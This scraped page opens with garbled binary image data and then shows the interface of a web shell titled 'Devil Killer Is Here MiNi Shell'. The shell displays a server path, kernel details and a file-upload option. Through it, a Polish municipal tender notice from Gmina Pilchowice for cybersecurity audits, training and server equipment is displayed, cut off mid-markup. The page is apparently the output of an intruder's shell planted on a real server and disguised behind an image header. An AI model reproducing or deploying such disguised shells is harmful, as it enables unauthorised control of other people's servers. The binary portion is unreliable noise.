JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250813/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250813/0037419801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Realizacja projektu Cyberbezpieczny samorząd w obszarach: organizacyjnym, kompetencyjnym, technicznym” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PILCHOWICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276257831</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Damrota 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pilchowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-145</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 32/ 235 65 21</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@pilchowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.pilchowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Firma doradcza ,,Publicus&#34; Agnieszka Kwitek</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">9691128893</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">ul. Jaśminowa 10</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Knurów</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">44-190</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">503044548</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">publicus@vp.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">https://www.firmagodnazaufania.pl/report/46622</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Realizacja projektu Cyberbezpieczny samorząd w obszarach: organizacyjnym, kompetencyjnym, technicznym” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ecc20395-3c6b-4498-b4c6-2decd990a24c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00374198</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00041635/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Realizacja projektu Cyberbezpieczny Samorząd w obszarach: organizacyjnym, kompetencyjnym, technicznym.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> realizowanego w ramach Programu Fundusze Europejskie Priorytet II Zaawansowane usługi cyfrowe działania 2.2. wzmocnienie krajowego systemu cyberbezpieczeństwa numer naboru FERC.02.02-CS.01-001/23, </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pilchowice.ezamawiajacy.pl/pn/pilchowice/demand/227460/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu komunikacja między Zamawiającym z Wykonawcami odbywa się<br/> drogą elektroniczną za pośrednictwem platformy zakupowej dostępnej pod adresem https://pilchowice.ezamawiajacy.pl zwanej dalej<br/> „Platformą”.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ogólne zasady korzystania z<br/> Platformy:<br/> 1) zgłoszenie do postępowania, złożenie oferty wymaga zalogowania Wykonawcy do systemu poprzez link:<br/> https://pilchowice.ezamawiajacy.pl, lub bezpośrednio na https://oneplace.marketplanet.pl;<br/> 2) Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl w<br/> celu zalogowania lub utworzenia bezpłatnego konta – UWAGA: Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych.<br/> Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w postaci<br/> elektronicznej;<br/> Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informację o możliwości przyspieszenia procedury<br/> założenia konta, wówczas należy skontaktować się z przedstawicielem Platformy pod numerem telefonu podanym w ww.<br/> potwierdzeniu;<br/> 3) w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z<br/> przedstawicielem Platformy pod numerem tel. +48 22 257 22 23 (infolinia dostępna w dni robocze w godzinach od 9:00 – 17:00), e<br/>mail: oneplace@marketplanet.pl;<br/> 3. Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ poprzez zakładkę „Zadaj pytanie” lub<br/> przy użyciu zakładki „Korespondencja”.<br/> 4. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem Platformy. Informacje<br/> dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał<br/> na Platformie. Korespondencja, przeznaczona do konkretnego Wykonawcy, będzie przekazywana w formie elektronicznej na<br/> pośrednictwem Platformy bezpośrednio do tego Wykonawcy.<br/> 5. Za datę złożenia oferty, przekazania wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/> dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na Platformę. <br/>6. Zamawiający, zgodnie z § 11 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/> sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/> elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące specyfikacji<br/> połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem<br/> Platformy tj:<br/> 1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/> 2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2GB Ram, procesor Intel IV 2GHZ lub nowsza, jeden z<br/> systemów operacyjnych – MS Windows 7, Mac Os x 10.4, Linux, lub nowsze;<br/> 3) dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji, w przypadku Internet Explorer minimalnie<br/> wersja 10.0;<br/> 4) włączona obsługa JavaScript;<br/> 5) program Adobe Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/> 7. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, rtf, pdf, xps, odt, ods,<br/> odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv,<br/> zip, tar, gz, gzip, 7z, html; xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMlenc.<br/> 8. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj: plik załączony przez Wykonawcę na Platformie i<br/> zapisany, widoczny jest w systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero<br/> po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/> 9. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany według czasu<br/> lokalnego serwera synchronizowanego odpowiednim źródłem czasu. <br/>10. Zamawiający nie przewiduje innego sposobu komunikowania się z Wykonawcami</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Administratorem Pani/Pana danych osobowych jest Gmina Pilchowice, ul. Damrota 6, 44-145 Pilchowice. Wykonawca może kontaktować się z Zamawiającym pisemnie na adres podany powyżej, telefonicznie: tel. 32-235-65-21, lub pod adresem e-mail: ug@pilchowice.pl. <br/><br/>Odrębnymi administratorami Państwa danych są: <br/>1.	Minister Funduszy i Polityki Regionalnej (dalej jako MFiPR), w zakresie w jakim pełni funkcję Instytucji Zarządzającej (IZ) Funduszami Europejskimi na Rozwój Cyfrowy 2021-2027 (dalej jako FERC) z siedzibą przy ul. Wspólnej 2/4, 00-926 Warszawa, <br/>2.	Centrum Projektów Polska Cyfrowa (dalej jako CPPC) w zakresie w jakim pełni funkcje Instytucji Pośredniczącej (IP) FERC, z siedzibą przy ul. Spokojnej 13A, 01-044 Warszawa, <br/>3.	Centrum Projektów Polska Cyfrowa (dalej jako CPPC) w zakresie w jakim pełni funkcje Beneficjenta FERC, z siedzibą przy ul. Spokojnej 13A, 01-044 Warszawa.<br/><br/><br/>Zgodnie zapisami SWZ rozdział XXVI i Załącznikiem do SWZ nr 7</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.23.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 807000,00 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 656097,56 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1: <br/>	usługa przeprowadzenia audytów KRI oraz SZBI dla Urzędu Gminy Pilchowice (2 szt.);<br/>	usługa przeprowadzenia audytów KRI oraz SZBI dla Ośrodka Pomocy Społecznej <br/>w Pilchowicach (2 szt.);<br/>	usługa opracowania dokumentacji z zakresu SZBI dla Urzędu Gminy Pilchowice (1 szt.);<br/>	usługa opracowania dokumentacji z zakresu SZBI dla Ośrodka Pomocy Społecznej <br/>w Pilchowicach (1 szt.);<br/>	usługa przeprowadzenia szkolenia z zakresu SZBI dla pracowników Urzędu Gminy Pilchowice (1 szt.);<br/>	usługa przeprowadzenia szkolenia z zakresu SZBI dla pracowników Ośrodka Pomocy Społecznej w Pilchowicach (1 szt.). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 115000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72800000-8 - Usługi audytu komputerowego i testowania komputerów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72810000-1 - Usługi audytu komputerowego</p> <p class="mb-0">79212000-3 - Usługi audytu</p> <p class="mb-0">80532000-2 - Usługi szkolenia w dziedzinie zarządzania</p> <p class="mb-0">80550000-4 - Usługi szkolenia w dziedzinie bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2<br/>usługa przeprowadzenia szkolenia z zakresu cyberbezpieczeństwa dla pracowników Urzędu Gminy Pilchowice (1 szt.);<br/>	usługa przeprowadzenia szkolenia z zakresu cyberbezpieczeństwa dla pracowników Ośrodka Pomocy Społecznej w Pilchowicach (1 szt.). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 22000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80550000-4 - Usługi szkolenia w dziedzinie bezpieczeństwa</p> <p class="mb-0">80532000-2 - Usługi szkolenia w dziedzinie zarządzania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający informuje, że dla każdej z Części postępowania, za najkorzystniejszą zostanie uznana oferta, która będzie miała najniższą cenę spośród wszystkich rozpatrywanych i nieodrzuconych ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3:<br/>	dostawa serwera wraz z licencjami dla Urzędu Gminy Pilchowice (1 szt.);<br/>	dostawa serwerów backup wraz dyskami dla Urzędu Gminy Pilchowice oraz Ośrodka Pomocy Społecznej w Pilchowicach (4 szt.);<br/>	dostawa zasilaczy awaryjnych UPS dla Urzędu Gminy Pilchowice oraz Ośrodka Pomocy Społecznej w Pilchowicach (4 szt.);<br/>	dostawa oprogramowania do zbierania logów dla Urzędu Gminy Pilchowice;<br/>	dostawa przełącznika sieciowego zarządzalnego dla Urzędu Gminy Pilchowice (1 szt.);<br/>	usługa konfiguracji i wdrożenia oferowanych rozwiązań </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 510000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48820000-2 - Serwery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30200000-1 - Urządzenia komputerowe</p> <p class="mb-0">48821000-9 - Serwery sieciowe</p> <p class="mb-0">35100000-5 - Urządzenia awaryjne i zabezpieczające</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <p class="mb-0">32420000-3 - Urządzenia sieciowe</p> <p class="mb-0">31122000-7 - Jednostki prądotwórcze</p> <p class="mb-0">32422000-7 - Elementy składowe sieci</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">180 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający informuje, że dla każdej z Części postępowania, za najkorzystniejszą zostanie uznana oferta, która będzie miała najniższą cenę spośród wszystkich rozpatrywanych i nieodrzuconych ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4:<br/>	dostawa agregatu prądotwórczego dla Urzędu Gminy Pilchowice (1 szt.). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 160000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31122000-7 - Jednostki prądotwórcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">35100000-5 - Urządzenia awaryjne i zabezpieczające</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający informuje, że dla każdej z Części postępowania, za najkorzystniejszą zostanie uznana oferta, która będzie miała najniższą cenę spośród wszystkich rozpatrywanych i nieodrzuconych ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span 